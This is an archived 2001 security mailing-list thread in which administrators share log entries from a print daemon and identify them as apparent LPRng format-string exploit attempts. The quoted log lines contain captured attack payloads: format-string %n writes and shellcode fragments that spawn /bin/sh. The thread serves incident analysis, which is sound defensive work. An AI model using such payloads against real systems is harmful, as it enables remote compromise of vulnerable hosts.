Hi Tim. I am going to take a guess, but this looks like the LPRng overflow, specifically the shellcode used. I could be wrong because this shellcode is used in other attacks as well. Tim Brown wrote: > > I tried to post this to the list earlier this week, but it never got here. > > A sysadmin found about 35 of these entries over a few seconds in her log this > morning (4/9/2001). Any ideas? > > Apr 5 21:30:27 sun1 bsd-gw[28481]: Invalid protocol request > (66): > > BBBXXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh > > "Leite, Zailo" wrote: > > > We've been getting this on messages since yesterday. Is this a worm trying > > to propagate? > > > > Z > > > > Apr 9 10:26:32 bing.bong.edu bsd-gw[25383]: Invalid protocol request (66): > > BBBXYZ[XXXXXXXXXXXXXXXXXX%.24u%300$n%.165u%301$n%.253u%302$n%.192u%303$n111F > > 1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh > > Apr 9 10:26:33 bing.bong.edu bsd-gw[25387]: Invalid protocol request (66): > > BBBHIJKXXXXXXXXXXXXXXXXXXsecurity%300$n%.181u%301$n%.253u%302$n%.192u%303$n1 > > 11F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh > > Apr 9 10:26:33 bing.bong.edu bsd-gw[25388]: Invalid protocol request (66): > > BBBDEFGXXXXXXXXXXXXXXXXXXsecu%300$n%.185u%301$n%.253u%302$n%.192u%303$n111F1 > > f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh > > -- > > Tim Brown > Network Security Analyst -- The events which transpired five thousand years ago; Five years ago or five minutes ago, have determined what will happen five minutes from now; five years
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 09:27:53 PDT